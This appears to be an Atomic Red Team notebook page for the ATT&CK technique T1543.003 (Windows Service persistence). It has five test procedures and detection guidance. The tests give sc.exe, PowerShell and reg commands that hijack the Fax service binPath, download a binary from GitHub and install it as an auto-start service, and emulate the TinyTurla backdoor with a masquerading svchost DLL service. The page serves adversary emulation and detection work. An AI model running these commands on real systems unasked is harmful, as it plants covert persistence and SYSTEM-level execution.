# T1543.003 - Windows Service
Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.(Citation: TechNet Services) Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry.

Adversaries may install a new service or modify an existing service to execute at startup in order to persist on a system. Service configurations can be set or modified using system utilities (such as sc.exe), by directly modifying the Registry, or by interacting directly with the Windows API. 

Adversaries may also use services to install and execute malicious drivers. For example, after dropping a driver file (ex: `.sys`) to disk, the payload can be loaded and registered via [Native API](https://attack.mitre.org/techniques/T1106) functions such as `CreateServiceW()` (or manually via functions such as `ZwLoadDriver()` and `ZwSetValueKey()`), by creating the required service Registry values (i.e. [Modify Registry](https://attack.mitre.org/techniques/T1112)), or by using command-line utilities such as `PnPUtil.exe`.(Citation: Symantec W.32 Stuxnet Dossier)(Citation: Crowdstrike DriveSlayer February 2022)(Citation: Unit42 AcidBox June 2020) Adversaries may leverage these drivers as [Rootkit](https://attack.mitre.org/techniques/T1014)s to hide the presence of malicious activity on a system. Adversaries may also load a signed yet vulnerable driver onto a compromised machine (known as "Bring Your Own Vulnerable Driver" (BYOVD)) as part of [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068).(Citation: ESET InvisiMole June 2020)(Citation: Unit42 AcidBox June 2020)

Services may be created with administrator privileges but are executed under SYSTEM privileges, so an adversary may also use a service to escalate privileges. Adversaries may also directly start services through [Service Execution](https://attack.mitre.org/techniques/T1569/002). To make detection analysis more challenging, malicious services may also incorporate [Masquerade Task or Service](https://attack.mitre.org/techniques/T1036/004) (ex: using a service and/or payload name related to a legitimate OS or benign software component).

## Atomic Tests

### Atomic Test #1 - Modify Fax service to run PowerShellThis test will temporarily modify the service Fax by changing the binPath to PowerShell
and will then revert the binPath change, restoring Fax to its original state.
Upon successful execution, cmd will modify the binpath for `Fax` to spawn powershell. Powershell will then spawn.
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
sc config Fax binPath= "C:\windows\system32\WindowsPowerShell\v1.0\powershell.exe -noexit -c \"write-host 'T1543.003 Test'\""
sc start Fax
```

In [ ]:
Invoke-AtomicTest T1543.003 -TestNumbers 1

#### Cleanup: 
```cmd
sc config Fax binPath= "C:\WINDOWS\system32\fxssvc.exe" >nul 2>&1```

In [ ]:
Invoke-AtomicTest T1543.003 -TestNumbers 1 -Cleanup

### Atomic Test #2 - Service Installation CMD
Download an executable from github and start it as a service.
Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Service binary must exist on disk at specified location (#{binary_path})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe"

```

In [ ]:
Invoke-AtomicTest T1543.003 -TestNumbers 2 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
sc.exe create AtomicTestService_CMD binPath= "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe" start=auto  type=Own
sc.exe start AtomicTestService_CMD
```

In [ ]:
Invoke-AtomicTest T1543.003 -TestNumbers 2

#### Cleanup: 
```cmd
sc.exe stop AtomicTestService_CMD >nul 2>&1
sc.exe delete AtomicTestService_CMD >nul 2>&1
```

In [ ]:
Invoke-AtomicTest T1543.003 -TestNumbers 2 -Cleanup

### Atomic Test #3 - Service Installation PowerShell
Installs A Local Service via PowerShell.
Upon successful execution, powershell will download `AtomicService.exe` from github. Powershell will then use `New-Service` and `Start-Service` to start service. Results will be displayed.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Service binary must exist on disk at specified location (#{binary_path})

##### Check Prereq Commands:
```powershell
if (Test-Path "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```powershell
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe"

```

In [ ]:
Invoke-AtomicTest T1543.003 -TestNumbers 3 -GetPreReqs

#### Attack Commands: Run with `powershell`
```powershell
New-Service -Name "AtomicTestService_PowerShell" -BinaryPathName "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe"
Start-Service -Name "AtomicTestService_PowerShell"
```

In [ ]:
Invoke-AtomicTest T1543.003 -TestNumbers 3

#### Cleanup: 
```powershell
Stop-Service -Name "AtomicTestService_PowerShell" 2>&1 | Out-Null
try {(Get-WmiObject Win32_Service -filter "name='AtomicTestService_PowerShell'").Delete()}
catch {}
```

In [ ]:
Invoke-AtomicTest T1543.003 -TestNumbers 3 -Cleanup

### Atomic Test #4 - TinyTurla backdoor service w64timeIt's running Dll as service to emulate the TinyTurla backdoor

[Related Talos Blog](https://blog.talosintelligence.com/2021/09/tinyturla.html)
**Supported Platforms:** windows
Elevation Required (e.g. root or admin)#### Attack Commands: Run with `command_prompt`
```command_prompt
copy "$PathToAtomicsFolder\T1543.003\bin\w64time.dll" %systemroot%\system32\
sc create W64Time binPath= "c:\Windows\System32\svchost.exe -k TimeService" type= share start=auto
sc config W64Time DisplayName= "Windows 64 Time"
sc description W64Time "Maintain date and time synch on all clients and services in the network"
reg add "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /t REG_MULTI_SZ /d "W64Time" /f
reg add "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /t REG_EXPAND_SZ /d "%systemroot%\system32\w64time.dll" /f
sc start W64Time```

In [ ]:
Invoke-AtomicTest T1543.003 -TestNumbers 4

#### Cleanup: 
```cmd
sc stop W64Time
sc.exe delete W64Time
del %systemroot%\system32\w64time.dll
reg delete "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Svchost" /v TimeService /f
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\W64Time\Parameters" /v ServiceDll /f```

In [ ]:
Invoke-AtomicTest T1543.003 -TestNumbers 4 -Cleanup

### Atomic Test #5 - Remote Service Installation CMD
Download an executable from github and start it as a service on a remote endpoint
Upon successful execution, powershell will download `AtomicService.exe` from github. cmd.exe will spawn sc.exe which will create and start the service. Results will output via stdout.

**Supported Platforms:** windows

Elevation Required (e.g. root or admin)
#### Dependencies:  Run with `powershell`!
##### Description: Service binary must exist on disk at specified location (#{binary_path})

##### Check Prereq Commands:
```cmd
if (Test-Path "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe") {exit 0} else {exit 1}

```
##### Get Prereq Commands:
```cmd
New-Item -Type Directory (split-path "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe") -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1543.003/bin/AtomicService.exe" -OutFile "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe"

```

In [ ]:
Invoke-AtomicTest T1543.003 -TestNumbers 5 -GetPreReqs

#### Attack Commands: Run with `command_prompt`
```command_prompt
sc.exe \\localhost create AtomicTestService_CMD binPath= "PathToAtomicsFolder\T1543.003\bin\AtomicService.exe" start=auto type=Own
sc.exe \\localhost start AtomicTestService_CMD
```

In [ ]:
Invoke-AtomicTest T1543.003 -TestNumbers 5

#### Cleanup: 
```cmd
sc.exe \\localhost stop AtomicTestService_CMD >nul 2>&1
sc.exe \\localhost delete AtomicTestService_CMD >nul 2>&1```

In [ ]:
Invoke-AtomicTest T1543.003 -TestNumbers 5 -Cleanup

## Detection
Monitor processes and command-line arguments for actions that could create or modify services. Command-line invocation of tools capable of adding or modifying services may be unusual, depending on how systems are typically used in a particular environment. Services may also be modified through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001), so additional logging may need to be configured to gather the appropriate data. Remote access tools with built-in features may also interact directly with the Windows API to perform these functions outside of typical system utilities. Collect service utility execution and service binary path arguments used for analysis. Service binary paths may even be changed to execute commands or scripts.  

Look for changes to service Registry entries that do not correlate with known software, patch cycles, etc. Service information is stored in the Registry at <code>HKLM\SYSTEM\CurrentControlSet\Services</code>. Changes to the binary path and the service startup type changed from manual or disabled to automatic, if it does not typically do so, may be suspicious. Tools such as Sysinternals Autoruns may also be used to detect system service changes that could be attempts at persistence.(Citation: TechNet Autoruns)  

Creation of new services may generate an alterable event (ex: Event ID 4697 and/or 7045 (Citation: Microsoft 4697 APR 2017)(Citation: Microsoft Windows Event Forwarding FEB 2018)). New, benign services may be created during installation of new software.

Suspicious program execution through services may show up as outlier processes that have not been seen before when compared against historical data. Look for abnormal process call trees from known services and for execution of other commands that could relate to Discovery or other adversary techniques. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as network connections made for Command and Control, learning details about the environment through Discovery, and Lateral Movement.